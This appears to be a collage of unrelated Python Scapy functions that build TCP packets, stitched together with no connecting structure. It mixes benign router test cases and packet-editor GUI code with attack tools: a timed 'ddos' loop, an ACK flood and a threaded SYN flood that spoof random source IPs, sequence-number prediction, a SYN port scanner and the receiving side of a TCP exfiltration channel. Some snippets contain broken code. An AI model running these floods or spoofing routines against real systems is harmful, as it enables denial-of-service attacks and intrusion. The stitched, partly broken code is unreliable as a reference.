def ddos (attack_time, target_ip): nomHote= socket.gethostname() source_ip = socket.gethostbyname(nomHote) source_port = 90 now = datetime.now temps_actuel = now.strftime("%Y/%m/%d %H:%M%S") if temps_actuel == attack_time: for d in range(0, 100): IP1 = IP(source_IP=source_ip, destination = target_ip) TCP1 = TCP(srcport=source_port, dstport = 80) pkt = IP1 / TCP1 send(pkt, inter=.002) print("\npaquet num ", d, " / 100 envoye ")
def verify_tcp_checksum(self): self.vapi.cli("test http server") p = self.params[socket.AF_INET] config_tun_params(p, self.encryption_type, self.tun_if) send = (Ether(src=self.tun_if.remote_mac, dst=self.tun_if.local_mac) / p.scapy_tun_sa.encrypt(IP(src=p.remote_tun_if_host, dst=self.tun_if.local_ip4) / TCP(flags='S', dport=80))) self.logger.debug(ppp("Sending packet:", send)) recv = self.send_and_expect(self.tun_if, [send], self.tun_if) recv = recv[0] decrypted = p.vpp_tun_sa.decrypt(recv[IP]) self.assert_packet_checksums_valid(decrypted)
def handshake_validation(mac, ip): sport = random.randint(1024, 65535) ip = IP(src=source_ip, dst=ip) syn = TCP(sport=sport, dport=443, flags='S', seq=1000) syn_ack = srp1(ip / syn, timeout=0.5, verbose=False) if syn_ack: validated_mac = syn_ack[0].src if mac == validated_mac: return False else: return True return True
def sendpkt(self, pkt, response): etherLayer = Ether(src=get_if_hwaddr(self.interface), dst=pkt[Ether].src) ipLayer = IP(src=pkt[IP].dst, dst=pkt[IP].src) tcpLayer = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, ack=pkt[TCP].seq + 1, seq=pkt[TCP].ack, flags="FA") newpkt = etherLayer / ipLayer / tcpLayer / response sendp(newpkt, verbose=0, iface=self.interface)
def test_tcp_checksum(self): """ verify checksum correctness for vpp generated packets """ self.vapi.cli("test http server") p = self.params[socket.AF_INET] vpp_tun_sa, scapy_tun_sa = self.configure_sa_tun(p) send = (Ether(src=self.tun_if.remote_mac, dst=self.tun_if.local_mac) / scapy_tun_sa.encrypt( IP(src=p.remote_tun_if_host, dst=self.tun_if.local_ip4) / TCP(flags='S', dport=80))) self.logger.debug(ppp("Sending packet:", send)) recv = self.send_and_expect(self.tun_if, [send], self.tun_if) recv = recv[0] decrypted = vpp_tun_sa.decrypt(recv[IP]) self.assert_packet_checksums_valid(decrypted)
def ack_flood(dst_ip, dst_port, one_work_num): for i in range(one_work_num): # IPlayer srcIP = random_ip() IPlayer = IP(src=srcIP, dst=dst_ip) # TCPlayer srcPort = randomPort() TCPlayer = TCP(sport=srcPort, dport=int(dst_port), flags="A", ack=random.randint(1, 4000000000)) # 发送包 ack_packet = IPlayer / TCPlayer send(ack_packet)
def calTSN(tgt): seqNum = 0 preNum = 0 diffSeq = 0 for x in range(1, 5): if preNum != 0: preNum = seqNum pkt = IP(dst=tgt) / TCP() ans = sr1(pkt, verbose=0) seqNum = ans.getlayer(TCP).seq diffSeq = seqNum - preNum print '[+] TCP Seq Difference: ' + str(diffSeq) return seqNum + diffSeq
def __init__(self): super(MainWindow, self).__init__() # Set up the user interface from Designer. self.setupUi(self) self.current_packet = Ether() / IP() / TCP() # TODO: move to function self.current_if_list = get_if_list() self.LoadNetworkInterfaces() self.SetConnections() #self.optionsIpLabel.setHidden(True)#TODO #self.optionsIpLineEdit.setHidden(True)#TODO self.show()
def trans_data(target_ip, target_port, data): #先建立TCP连接 start_tcp(target_ip=target_ip, target_port=target_port) #print sport,s_seq,d_seq #发起GET请求 ans = sr1( IP(dst=target_ip) / TCP(dport=target_port, sport=sport, seq=s_seq, ack=d_seq, flags=24) / data, verbose=False) #ans.show() #读取服务端发来的数据 rcv = ans[Raw] print(rcv)
def run(self): i = 0 print("Thread {} started".format(self.id)) ip_data = IP(src=self.source, dst=self.target) time_start = time.time() while True: src_port = RandNum(1024, 65535) syn = TCP(sport=src_port, dport=self.port, flags="S") send(ip_data / syn, verbose=False, iface=self.interface) i += 1 if i % 1000 == 0: print("Thread {} sent {} packets, speed: {} pkts".format( self.id, i, 1000 / (time.time() - time_start))) time_start = time.time()
def make_a_list(list2, sequ): packetlist = [] for place in list2: deport = random.randint(1000, 65535) wat = IP(dst=IPE) / TCP(dport=deport, seq=sequ) print sequ sequ += len(place) packetlist.append(wat) random.shuffle(packetlist) # packet_help = packetlist[:len(packetlist)-1] for place2 in packetlist: ThreeWayHandshake(place2[TCP].dport) send(place2) return packetlist
def __init__(self): self.ip_list = self.tcp_list = self.eth_list = [] self.ip_list = [field.name for field in IP().fields_desc] self.tcp_list = [field.name for field in TCP().fields_desc] self.eth_list = [field.name for field in Ether().fields_desc] self.udp_list = [field.name for field in UDP().fields_desc] try: self.ip_list.remove("options") self.tcp_list.remove("options") self.eth_list.remove("options") self.udp_list.remove["options"] except: pass self.tot_col = self.eth_list + self.ip_list + ["time"] + self.tcp_list
def analyze(packet): src= packet.getlayer(1).src ip = IP(dst=src) tcp = packet.getlayer(2) ack = Ether() / ip / TCP(sport=tcp.dport, dport=tcp.sport, seq=tcp.fields['ack'], ack=tcp.fields['seq'] + 1) print(str(ack)) jobid = tcp.sport packet_index = tcp.seq raw = packet.lastlayer() data = raw.fields['load'] if packet_index == 0: app_exfiltrate.register_file(jobid, data) flags = "SA" elif data[0:5] == 'DONE:': app_exfiltrate.retrieve_file(jobid, data[5:]) return else: flags = "A" app_exfiltrate.retrieve_data(jobid, packet_index, data) ack = Ether() / ip / TCP(sport=tcp.dport, dport=tcp.sport, seq=tcp.seq, flags=flags, ack=tcp.seq + 1) sendp(ack)
def assemble_probe(fwd_label_list, tmy_label_list): probe_pkt = Ether() / IP() / TCP(dport=PORT_FWD) fwd_len = len(fwd_label_list) probe_pkt = probe_pkt / FWD_header(label_cnt=fwd_len) for outport in fwd_label_list: probe_pkt = probe_pkt / FWD_label(outport=outport) tmy_len = len(tmy_label_list) probe_pkt = probe_pkt / TMY_header(label_cnt=tmy_len) for switch_id, bitmap in tmy_label_list: probe_pkt = probe_pkt / TMY_label(switch_id=switch_id, bitmap=bitmap) return probe_pkt
def main(): my_packet = sniff(count=1, filter='tcp and tcp.flags.syn==1 and tcp.flags.ack==0' ) # should add another filter port = my_packet[TCP][0].dport if my_packet: new_packet = IP(dst='0.0.0.0') / TCP( dport=port, seq=random.randint(0, 10000), flags='SA') got = sr1(new_packet, timeout=0.8) if got: my_packet = sniff(count=1, filter='tcp') # should add another filter while my_packet: # ## pass
def _l4_hdr(self): if self.stream.l4 is not None: l4_header = self.stream.l4.__dict__ proto = self.stream.get_l4_proto() if proto == 'tcp': return TCP(**l4_header) elif proto == 'udp': return UDP(**l4_header) elif proto == 'icmp': return ICMP(**l4_header) elif proto == 'icmpv6': return ICMPv6EchoRequest() else: log.error("Unsupported L4 protocol %s." % proto)
def send_and_verify_ip4(self, src_pg, dst_pg, mss, expected_mss): # IPv4 TCP packet with the requested MSS option. # from a host on src_pg to a host on dst_pg. p = (Ether(dst=src_pg.local_mac, src=src_pg.remote_mac) / IP(src=src_pg.remote_ip4, dst=dst_pg.remote_ip4) / TCP(sport=1234, dport=1234, flags="S", options=[('MSS', (mss)), ('EOL', None)]) / Raw('\xa5' * 100)) rxs = self.send_and_expect(src_pg, p * 65, dst_pg) for rx in rxs: self.verify_pkt(rx, expected_mss)
def build_query(self, conf): """Method used to build the packet to send TCP test need to validate any kind of TCP packet so let's use TCP SYN :conf: the namespace configuration :returns: packet to send """ pkt = Ether(src=conf['mac_local'], dst=conf['mac_nh']) pkt /= IP(src=conf['ip_priv'], dst=conf['ip_rmt'], id=RandShort()) pkt /= TCP(sport=RandShort(), dport=RandShort(), flags='S') pkt /= self._payload return fragment(pkt.__class__(str(pkt)))
def run(self): # There are two different ways you can go about pulling this off. # You can either: # - 1. Just open a socket to your target on any old port # - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated! # # (Uncomment whichever method you'd like to use) # Method 1 - s = socket.socket() s.connect((target, port)) # Methods 2 - i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' send(i / t, verbose=0)
def test_start_two_ipv4_tcp_attacks(self): """ Tests to ensure that two IPv4 UDP attacks have been triggered :return: """ pkt1 = (Ether(src='00:00:00:00:01:01', dst=self.dst_mac) / IP( dst=self.dst_ipv4, src=self.src_ipv4, proto=consts.UDP_PROTO) / UdpInt() / IntShim(length=9, next_proto=consts.TCP_PROTO) / IntHeader(meta_len=1) / IntMeta1(switch_id=3) / IntMeta2(switch_id=2) / SourceIntMeta(switch_id=1, orig_mac=self.orig_mac) / TCP(dport=self.dport, sport=self.sport) / 'hello transparent-security') pkt2 = (Ether(src='00:00:00:00:01:01', dst=self.dst_mac) / IP( dst=self.dst_ipv4, src=self.src_ipv4, proto=consts.UDP_PROTO) / UdpInt() / IntShim(length=9, next_proto=consts.TCP_PROTO) / IntHeader(meta_len=1) / IntMeta1(switch_id=3) / IntMeta2(switch_id=2) / SourceIntMeta(switch_id=1, orig_mac=self.orig_mac) / TCP(dport=self.dport, sport=self.sport) / 'hello transparent-security') for index in range(0, self.ae.packet_count): logger.info('Iteration #%s', index) ret_val1 = self.ae.process_packet(pkt1) ret_val2 = self.ae.process_packet(pkt2) logger.info('Checking index - [%s] - count - [%s]', index, self.ae.packet_count) if index * 2 < self.ae.packet_count: logger.info('Expecting false - [%s]', ret_val1) self.assertFalse(ret_val1) self.assertFalse(ret_val2) else: logger.info('Expecting true - [%s]', ret_val1) self.assertTrue(ret_val1) self.assertTrue(ret_val2)
def test_simple_list(self): packet = (Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00") / IP(src="0.0.0.0", dst="127.0.0.1") / TCP()) packet_result = [ { "Ethernet": { "src": "00:00:00:00:00:00", "dst": "ff:ff:ff:ff:ff:ff", "type": 2048, } }, { "IP": { "frag": 0, "src": "0.0.0.0", "proto": 6, "tos": 0, "dst": "127.0.0.1", "chksum": None, "len": None, "options": [], "version": 4, "flags": None, "ihl": None, "ttl": 64, "id": 1, } }, { "TCP": { "reserved": 0, "seq": 0, "ack": 0, "dataofs": None, "urgptr": 0, "window": 8192, "flags": None, "chksum": None, "dport": 80, "sport": 20, "options": [], } }, ] to_list_result = to_list(packet) self.assertTrue(isinstance(to_list_result, list)) self.assertEqual(to_list_result, packet_result)
def send_tcp_syn_pkts (dumb,extra_ports,burst_time): logging.warning("In function : send_tcp_syn_pkts") print ("In function : send_tcp_syn_pkts") # try: i =0 burst_val =0 curr_vlan = int(addr_base) port_curr_hostip = int(start_host_ip) while (i< int(port_count)): j=0 while(j<int(hosts_per_port)): curr_mac = get_mac(l2_addr_prefix,port_curr_hostip) curr_ip = get_ip(l3_addr_prefix,port_curr_hostip,curr_vlan) #seq_num=RandInt().max seq_num=random.randint(1000,45000) if host_info.has_key(curr_ip): SOURCE = host_info[curr_ip]['sport'] SOURCE = int(extra_ports) if SOURCE > 65530: SOURCE =2 if False: print curr_mac print curr_ip print seq_num print SOURCE print dst_mac print d_port print TARGET_IP if True: if ((str(connection_type) == "plainbgp") or (str(connection_type) == "plainbgp")): tcp_syn=Ether(dst=dst_mac,src=curr_mac)/IP(dst=TARGET_IP,src=curr_ip)/TCP(sport=int(SOURCE),dport=int(d_port),seq=seq_num,ack=0) else: tcp_syn=Ether(dst=dst_mac,src=curr_mac)/Dot1Q(vlan=curr_vlan)/IP(dst=TARGET_IP,src=curr_ip)/TCP(sport=int(SOURCE),dport=int(d_port),seq=seq_num,ack=0) if (curr_mac != "ff:ff:ff:ff:ff:ff"): host_info[curr_ip]['seq']=seq_num+1 host_info[curr_ip]['ack']=0 sendp(tcp_syn,iface=str(interface)) host_info[curr_ip]['lastpkt']=tcp_syn burst_val = burst_val + 1 Syn_Host[curr_ip] = Syn_Host[curr_ip] + 1 if (int(burst_val) > int(MAX_BURST)): burst_val = 0 #sleep(float(BURST_TIMER)) sleep(float(burst_time)) port_curr_hostip = int(port_curr_hostip) + 1 j = j + 1 curr_vlan = curr_vlan + 1 i = i+1
def TCP_SYN_port_scan(dict, ports): """ dict: a dictionary generated from the function arp_scan. type dictionary ports: the port(s) or range of ports to scan. type int, tuple or list """ hosts = dict # scan the hosts for open TCP ports as listed in the provided dictionaty for host in hosts: # Stuck the Layer 3 header and the TCP payload tcp_packet = IP(dst=host) / TCP(dport=ports, flags="S") # send the TCP package for all ports and collect all answers answered, unanswered = sr(tcp_packet, timeout=2, verbose=False) # for each of the answers received, for answer in answered: # if the answer is "SYN AKN" or 0x12 in hex, # append the port to the results dictionary as open if answer[1][TCP].flags == 0x12: hosts[host]["ports"][answer[1][TCP].sport] = "open" # send a TCP reset flag to terminate the connection send(IP(dst=host) / TCP(dport=answer[1][TCP].sport, flags="R"), verbose=False) # if the answer is "RESET" append the port to the results dictionary as closed elif answer[1][TCP].flags == 0x14: hosts[host]["ports"][answer[1][TCP].sport] = "closed" else: if answer.haslayer(ICMP): if int(answer.getlayer(ICMP).type) == 3 and\ int(answer.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]: hosts[host]["ports"][answer[1] [ICMP].sport] = "filtered" # for each of the unanswersed ports received, add them to the results as filtered for not_answer in unanswered: hosts[host]["ports"][not_answer[1][TCP].dport] = "filtered" return hosts
def create_stream_encrypted(self, src_mac, dst_mac, src_ip, dst_ip, sa): return [ # TCP Ether(src=src_mac, dst=dst_mac) / sa.encrypt( IP(src=src_ip, dst=dst_ip) / TCP(dport=self.tcp_port_out, sport=20)), # UDP Ether(src=src_mac, dst=dst_mac) / sa.encrypt( IP(src=src_ip, dst=dst_ip) / UDP(dport=self.udp_port_out, sport=20)), # ICMP Ether(src=src_mac, dst=dst_mac) / sa.encrypt( IP(src=src_ip, dst=dst_ip) / ICMP(id=self.icmp_id_out, type='echo-request')) ]
def test_simple_dict(self): packet = (Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00") / IP(src="0.0.0.0", dst="127.0.0.1") / TCP()) packet_result = { "Ethernet": { "src": "00:00:00:00:00:00", "dst": "ff:ff:ff:ff:ff:ff", "type": 2048, } } to_dict_result = to_dict(packet) self.assertTrue(isinstance(to_dict_result, dict)) self.assertEqual(to_dict_result, packet_result)
def _SetWindow(self): if self.windowCheckbox.isChecked() is True: self.windowLineEdit.setEnabled(False) tmp_pkt_eth = Ether() tmp_pkt_ip = IP() # This depends on chosen packet type tmp_pkt_transp = TCP(dataofs=self._current_data_offset_or_len) tmp_pkt_raw = Raw(load=self._current_load) tmp_pkt = tmp_pkt_eth / tmp_pkt_ip / tmp_pkt_transp / tmp_pkt_raw tmp_pkt = tmp_pkt.__class__(raw(tmp_pkt)) # LOL hacked self.windowLineEdit.setText(str(tmp_pkt.window)) self._current_window = tmp_pkt.window self._SetHeaderChecksum() else: self.windowLineEdit.setEnabled(True)
def send_winning_packet(packet, sourceip): res_ip = IP(dst=sourceip, flags="DF") res_data = "HTTP/1.1 200 OK\r\n\ Date: Thu, 1 Jan 2000 01:01:01 GMT\r\n\ Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.3.29\r\n\ Content-Length: 10\r\n\ Content-Type: text/html\r\n\r\n\ congratz! the flag is: " + challenge_flag res_tcp = TCP(flags="SA", sport=80, dport=packet['TCP'].sport, seq=1, ack=1234567890) send(res_ip / res_tcp / res_data, verbose=False) users[sourceip] = User()
def create_stream_plain(self, src_mac, dst_mac, src_ip, dst_ip): return [ # TCP Ether(src=src_mac, dst=dst_mac) / IP(src=src_ip, dst=dst_ip) / TCP(sport=self.tcp_port_in, dport=20), # UDP Ether(src=src_mac, dst=dst_mac) / IP(src=src_ip, dst=dst_ip) / UDP(sport=self.udp_port_in, dport=20), # ICMP Ether(src=src_mac, dst=dst_mac) / IP(src=src_ip, dst=dst_ip) / ICMP(id=self.icmp_id_in, type='echo-request') ]
def cal_TSN(tgt): seq_num = 0 pre_num = 0 diff_seq = 0 for x in range(1, 5): if pre_num: pre_num = seq_num pkt = IP(dst=tgt) / TCP() ans = sr1(pkt, verbose=0) seq_num = ans.getlayer(TCP).seq diff_seq = seq_num - pre_num print(f'[+] Diferencia en la sequencia TCP: {str(diff_seq)}') return seq_num + diff_seq
def syn_443(host, queue=None): try: ans, uans = sr(IP(dst=host) / TCP(dport=443, flags="S"), timeout=5, verbose=False) if len(ans) > 0: ip = ans[0][1].fields['src'] if queue is None: print(ip, ' is up') return ip else: print(ip, ' is up') queue.put(ip) except Exception as e: pass